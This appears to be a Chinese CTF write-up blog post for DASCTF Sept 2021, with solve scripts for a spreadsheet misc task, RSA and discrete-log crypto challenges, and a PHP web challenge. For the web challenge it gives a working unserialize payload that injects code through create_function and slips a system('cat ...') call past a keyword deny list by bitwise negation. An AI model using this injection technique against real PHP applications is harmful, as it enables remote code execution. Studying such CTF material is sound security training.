DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp

最新推荐文章于 2023-08-06 18:20:14 发布
最新推荐文章于 2023-08-06 18:20:14 发布
阅读量1.6k 收藏 2
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Airwooh/article/details/120479383
版权

排名28,还是太菜了,web就出了一道,eur1ka yyds

文章目录


在这里插入图片描述

MISC

Girlfriend’s account

import re

import xlrd

data=xlrd.open_workbook("D:\webtest\information.xls")
table = data.sheets()[0]
nrows = table.nrows

price=table.col_values(0, start_rowx=1, end_rowx=5001)
number=table.col_values(1, start_rowx=1, end_rowx=5001)


def num_change(num):
    if num=='零':
        return 0;
    if num=='壹':
        return 1;
    if num=='贰':
        return 2;    
    if num=='叁':
        return 3;
    if num=='肆':
        return 4;
    if num=='陆':
        return 6;
    if num=='伍':
        return 5;
    if num=='柒':
        return 7;
    if num=='捌':
        return 8;
    if num=='玖':
        return 9;

def aoligeiganle(amount):
    chinese_num = {'零': 0, '壹': 1, '贰': 2, '叁': 3, '肆': 4, '伍': 5, '陆': 6, '柒': 7, '捌': 8, '玖': 9}
    chinese_amount = {'分': 0.01, '角': 0.1, '元': 1, '拾': 10, '佰': 100, '仟': 1000, '圆': 1}
    amount_float = 0
    if '亿' in amount:
        yi = re.match(r'(.+)亿.*', amount).group(1)
        amount_yi = 0
        for i in chinese_amount:
            if i in yi:
                amount_yi += chinese_num[yi[yi.index(i) - 1]] * chinese_amount[i]
        if yi[-1] in chinese_num.keys():
            amount_yi += chinese_num[yi[-1]]
        amount_float += amount_yi * 100000000
        amount = re.sub(r'.+亿', '', amount, count=1)
    if '万' in amount:
        wan = re.match(r'(.+)万.*', amount).group(1)
        amount_wan = 0
        for i in chinese_amount:
            if i in wan:
                amount_wan += chinese_num[wan[wan.index(i) - 1]] * chinese_amount[i]
        if wan[-1] in chinese_num.keys():
            amount_wan += chinese_num[wan[-1]]
        amount_float += amount_wan * 10000
        amount = re.sub(r'.+万', '', amount, count=1)

    amount_yuan = 0
    for i in chinese_amount:
        if i in amount:
            if amount[amount.index(i) - 1] in chinese_num.keys():
                amount_yuan += chinese_num[amount[amount.index(i) - 1]] * chinese_amount[i]
    amount_float += amount_yuan

    return amount_float

sum=0


for i in range(0,5000):
    sum+=aoligeiganle(price[i])*num_change(number[i])

print(sum)

没啥好说的,写了个脚本,跑就是了

web

hellounser

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}

class B{
    public $func;
    public $arg;
    
    public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }
    
    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    }
    
    
}

if(isset($_GET['pop'])){
    $aaa = unserialize($_GET['pop']);
    $aaa();
}
else{
    highlight_file(__FILE__);
}

?>

利用了一个函数create_function

有一些小trick

先上payload

<?php


class A {
    public $var;

    function __construct()
    {
        $this->var=new B(); 
    }
}

class B{
    public $func="\create_function";
    
    public $arg="};(~(".~'system'.")) (~(".~'cat Tru3flag.php'."));//";
    
    
    
}
$a=new A();
echo urlencode(serialize($a));

有点像bjd2020 ezphp 最后一步也是这样做的,首先有一个/isD匹配 s代表多行 所以加个\就能绕过,在arg处有一个过滤,用取反执行命令即可

cry

签到

import sympy
import binascii

m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
n = 2 ** 256
flag=sympy.discrete_log(2**512,c,m)
print(binascii.unhexlify(hex(flag)[2:]))

RSA1

from hashlib import sha512
from Crypto.Util.number import long_to_bytes, getPrime, bytes_to_long
from libnum import invmod, gcd
import itertools
import time
import random
n=0xb41fb5d27aaacb43b64fed1bf6e11d0841ad4ad34e398f623479f734614f14075efce2f3f66361ed6cbea9e6b37fbf3d40764c5b1f802a37c5dc9ef7936a811e7fbcc282db778436315733926acc6cf29ae656814f412b6214de34c3decb2fb997df7de72589d059a6c8f6477e225b904a8a19ce220a5162182bff50b78517421f08ad9926e998060d481ef96c563ad3de95775885efa28772d58819d759cb8cf38da0dae0c93f0e54485fdc8468eff77f32653dd89bff7682a677be8d6c0327b372605202c657ccf82cf4d6678e017ffede8823d5804cba1e577ea5fa1d1b2cbe7ef5fefc691bd32757e98326abaf372d8f0fb83acd8528cbe79272a6c6a9ed6050e979680a6df31d7f91fee2d95944e1157f556661ec838c23ae257cfd844fc394e245fdbec934a976f82fb5e788f3cbfefa9b606599f40dfc02f49e60b0549f90d916abd89a9d8a06c95ad7f5429ecb1af5d1cb7eea5d9a1809fdd321f6148ef74094da19610af72687b0fb16ba7d81c1febd97d1aa1433e6f1a0e544208d136d358078dbd84099fcf9a1f439bf6e9d141317366f0904e24b561b66a1a54e309f0ea453691c0a16958245a726f68924cef0c44890f687899835df24d2e898164ceec8139ad6dd3b82e85d9b8081d5935618336c5a32785d6ecafa702aec3a2e605fa012b13e9f992203f597b272cd763fac797b0553755458a8dd765f488bL
e=0x1c4ff8928b4500a433443c1c9453a0cf97709941e0d8a9e6bcce3322199d0aaffd3af1f3611724f75911501113d2e45f8e28949750506a0e5da6a752f1b3904ef2c7b332a936e462804e1e218fe53a97fdbde339c2b825f00f07a8276c1c91b008e92bb81c343d66e80ca014ab625c6abf3968cc8a0f95e05f8dbafe23f217f7c356f6c382893817fc93f9dcc9fbaa625e0a606b6543518f52f40dad271c19ba95f7ceb8f371da5831915400cc3710a4b28eb7b154c4c238583f9dea6acfda554034134ced17f0f31c434753b4464202f1abec5ba6068a640602013bb13c4e90b190934d0bbdd68d8f827f93c90391b244ab0378cfdc4f0d70369bf5b511e74212dd8f7f167a3c914ac6206614daa009766ca381e614052c159459f6c73cb12448976ede30dcc6f4d2022259ac7d9566ba16bf1497ac7f26b40f484fc41f36b0b14a8d7a2fcd1a2311283e191ca5e1a5bba0ba99e13f38b46938f5cb2a31c19a3b9c0e77bd7e91120918fb2d8417fb6cd4e13c0ae8a2972e00ac668d1414a6d460223f6704e903156158d846278378c880c5316cb460efc791c07f0162ece663758cd66135e172af1f715e7f58b578dff23c3beb29c3e955982b2484625ac34e698987e7e81167b40e68118c3002aaff9a1d420a36edf8e34c197e7ecdcf4858620fe720a8dffca3928377abbbaf10532d3df8f81e36cce2efc76ea301edb4abL
enc_flag=0x39159c3347b30b993b02607d4e0add3d7550b0239191c562d12d674d535ab99458c021a6ed2baf0403400d76c7fc81017af027146e80489067f912590c1b44f6eb071bec820eae589d6efd8eab806d69ad11556141fd9b32e046fbc8ea1ca70942489c31d431301c5c04d2b9af84db0fce4ca9ac143b29bc22d4a6f694019dd8b54c24969641c465bee3d3ee8aaf8cf2144249690fb54d4a9c8631d90a2f3039d766fae259d0bc4eba19017e140d3042deb73a6361d00deb3324d53def9d208c9e76e16d8322b4f75713960a5975a8c7084deddd53d2d42153a6240efbda5a8751fe0cd3bbbc7267cafbc58b885370500a0a2fba32a539237b9a2b9973bea21e1daf9e1b72a742ef84998ac487b01816334c1b81549358a6963f7371e28a229043252fb2fbe4904f969ec32d9b0d8a93c855d3165c92813599114870275802043e1ec2c46f2b425c546c077d4314cb7cecfa156f31fb02302d8fa5323d33794302f9265ed34efe5601caa7c676f2624fd50f090d601f6b494e2697d46e1c63eeb1f9ca365965fc32d1a688dc7bd68ea98a555ceb3556668b44620cc432fe06a95f5a57ab07e963c312bc99b522b2e9ffaa03bee231696ea121fd0485a11c47d5dd78553847cc4bbe4b1cdcea69c1c802d194fa2cf34bc6ccaceb3bf8c229a9baa4f40f0adcae4fff6e012c062eabc95ceab679fd6c46f5540134cff383df7931L
fuzzing = "abcdefghijklmnopqrstuvwxyz0123456789QWERTYUIOPASDFGHJKLZXCVBNM"
fuzz = itertools.permutations(fuzzing, 5)

def cal_bit(num):
	num = int(num)
	l = len(bin(num))
	return l-2

def isqrt(n):
    x = n
    y = (x + 1) // 2
    while y < x:
        x = y
        y = (x + n // x) // 2
    if pow(x, 2) == n:
    	return x
    else:
    	return False

def divide_pq(ed, n):
	# ed = e*d
	k = ed - 1
	while True:
		g = random.randint(3, n-2)
		t = k
		while True:
			if t % 2 != 0:
				break
			t /= 2
			x = pow(g, t, n)
			if x > 1 and gcd(x-1, n) > 1:
				p = gcd(x-1, n)
				return (p, n/p)

def pi_b(x):
	bt = 536380958350616057242691418634880594502192106332317228051967064327642091297687630174183636288378234177476435270519631690543765125295554448698898712393467267006465045949611180821007306678935181142803069337672948471202242891010188677287454504933695082327796243976863378333980923047411230913909715527759877351702062345876337256220760223926254773346698839492268265110546383782370744599490250832085044856878026833181982756791595730336514399767134613980006467147592898197961789187070786602534602178082726728869941829230655559180178594489856595304902790182697751195581218334712892008282605180395912026326384913562290014629187579128041030500771670510157597682826798117937852656884106597180126028398398087318119586692935386069677459788971114075941533740462978961436933215446347246886948166247617422293043364968298176007659058279518552847235689217185712791081965260495815179909242072310545078116020998113413517429654328367707069941427368374644442366092232916196726067387582032505389946398237261580350780769275427857010543262176468343294217258086275244086292475394366278211528621216522312552812343261375050388129743012932727654986046774759567950981007877856194574274373776538888953502272879816420369255752871177234736347325263320696917012616273L
	return invmod(x, bt)

def con_fra(a, b):
	r = []
	while True:
		if a == 1:
			break
		tmp = a/b
		if tmp != 0:
			r.append(tmp)
		a, b = b, (a-tmp*b)
	return r

def wiener_attack(e, n):
	cf = con_fra(e, n)
	for x in xrange(len(cf)):
		k, d = 0, 1
		while x >= 0:
			k, d = d, d*cf[x] + k
			x -= 1
		# print "k: %s\nd: %s\n" %(k, d)
		phi_n = (e*d - 1)/k
		B = n - phi_n + 1
		C = n
		dt = pow(B, 2) - 4*C    # b^2 - 4*a*c
		if dt >= 0 and isqrt(dt) and (B+isqrt(dt)) % 2 == 0:
			print "phi_n: ", hex(phi_n)
			return phi_n
	print "wiener attack fail!"
    
t = pi_b(e)
print "get t = ", hex(t)
phi_n = wiener_attack(t, n)
u = invmod(t, phi_n)
print "get u = ", hex(u)
qq, pp = divide_pq(u*t, n)
print "get p = ", hex(pp)
print "get q = ", hex(qq)
d = invmod(e, (qq-1)*(pp-1))
print "get d = ", hex(d)
flag = pow(enc_flag, d, n)
print "get flag: ", long_to_bytes(flag)
[A]ir
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 387
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn datasystem
yongbaoii的博客
09-27 318
开了沙箱。 看到两个特征数的时候显然知道是md5了,密码需要md5.
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hehepwn
yongbaoii的博客
09-27 391
利用格式化字符串泄露canary再ret2libc就可以了。 开了沙箱,可以先mprotect一下,再用shellcode来orw。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') els.
DASCTF Sept X 浙江工业大学秋季挑战赛 web
weixin_43610673的博客
09-26 826
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function __toString(
[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser
cosmoslin的博客
09-28 572
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function show(){
Visual Assist X_10.9.2237.0
10-31
Windows 10 Build 15063.608, issued Sept 12th, broke a hook mechanism. Windows Version 1709 (Fall Creators Update), released Oct 17th, broke also CreateWindow(). Microsoft is actively seeking ...
microtca_short_form_sept_2006
07-20
microtca_short_form_sept_2006
Sept8Exercises
05-10
#csc462UML 2015年9月3日,用于课堂作业的起始代码存储库。 目标是让班级克隆存储库,并通过导入3个班级练习的项目来用作本地蚀工作区进行分析。 删除不需要的软件包。 将JUnit测试添加到edu.elon.test包中的ATM...
工业必须掌握英文简写读写
11-12
FAT factory acceptance test 工厂验收测试 əkˈseptəns SAT site acceptance test 站点验收测试 sait DQR design qualification report 设计确认报告 ri'kɔ:d IQR installation qualification record 安装确认...
fusioneer-2015-sept
05-07
$ cd fusioneer-2015-sept 安装依赖项: $ gem install bundler # if you don't have it $ bundle install 健全性检查设置 要验证所有设置是否正确,请运行以下命令: $ ruby sanity_test.rb 您应该看到以下输出...
DASCTF9月赛pwn-wp
Stella_Leo的博客
09-28 1506
DASCTF-2021-9月 头一次打安恒月赛,体验还不错,没有足够的时间,稍微看了下pwn,两个栈是我没想到的,然后还有一个heap题目,然而还需要先绕过re认证才能正常的pwn也是我没想到的。。 文章不贴图片了,较简单 hehepwn 啥保护没开 这是最简单的,就一个scanf明显的溢出,然后strdup函数那里,可以写满s把\x00打没了,然后泄露rbp,然后就是ret2shellcode exp #coding:utf-8 from pwn import * context.log_level='d
DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account
Le1a's Blog
09-26 291
Girlfriend’s account 下载附件,得到一个excel表格,打开得到 flag{账单总金额四舍五入保留至小数点后两位},例如总金额为 543.21 元时,你需要提交 flag{543.21} 也就是说这个excel是个账单,不仅有商品单价,还有购买商品的数量,flag就是计算账单的总额,也就是算他女朋友花了多少钱,然后保留两位小数。 excel有函数可以计算乘法跟求和,但是这里并不是阿拉伯数字,所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字 。百度上查阅一下 百度知道链
DASCTF Sept X 浙江工业大学秋季挑战赛 writeup
09-26 2640
crypto-welcome 签到 已知n、m、c 求e,sage脚本 m = 73964803637492582853353338913523546944627084372081477892312545091623069227301 c = 21572244511100216966799370397791432119463715616349800194229377843045443048821 n = 2 ** 256 e=discrete_log(c,mod(m,n)) print(e) #348528
python xlrd对excel文件的读取
xu19950525的博客
10-09 540
XLRD库主要是对文件进行读取,写文件一般用xlwt库,该库遵循 ”读取修改覆盖“ 的原则。 import xlrd # 打开文件 workbook = xlrd.open_workbook('C:/Users/Administrator/Desktop/s4.xlsx') sheet2_name = workbook.sheet_names() # 获取所有sheet名称 prin...
DASCTF2022 ——十月赛 Web 部分Writeup
渗透测试研究中心
10-28 1432
EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public起点是 sorry 类的__destruct(), 由echo $this->hint调用到 show 类的__toString()方法, 然后通过执行$this->ctf->show()跳转 secret_code 类的__call(), 进而到show()方法, ...
【pwn】DASCTF Sept 九月赛
woodwhale的博客
09-26 3689
【pwn】DASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
[DASCTF 2023 & 0X401七月暑期挑战赛] Web方向部分题 详细Writeup
Leaf_initial的博客
08-06 442
对于不是XXE盲注得到密码登录而是通过万能密码登入的话,由于登录的账户不是admin,每执行一次操作,session就会销毁一次,所以在每次操作之前,都要把登录的包重新发一遍,重置session。__file__是从中加载模块的文件的路径名(如果它是从文件加载的)。这段代码是一个Django项目的设置文件(settings.py),它包含了配置项目的各种设置,如数据库连接、模板路径、国际化设置等。这里一开始没有弹出来,说是生成payload时的python版本,pickle包版本等等,将版本换成了。
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫
09-25 1261
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
DASCTF2022.07赋能赛 WEB题目复现
绮洛Ki1ro的博客
08-10 1048
其实7月时就想复现了,感觉题目质量挺高的,但奈何自己太菜看不懂就先搁置了。现在有能力回来填坑啦,但最后一题目前对自己理解起来还是有点难度,之后再研究研究。
r语言中paste(la," ",pct,"%",sept="")各参数的意义
最新发布
08-17
在你提供的例子中,paste(la," ",pct,"%",sept="")的各参数的意义如下: - la: 这是一个字符向量或者一个对象,表示需要连接的第一个对象。 - " ": 这是一个字符串,表示需要添加到连接对象之间的分隔符。在这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值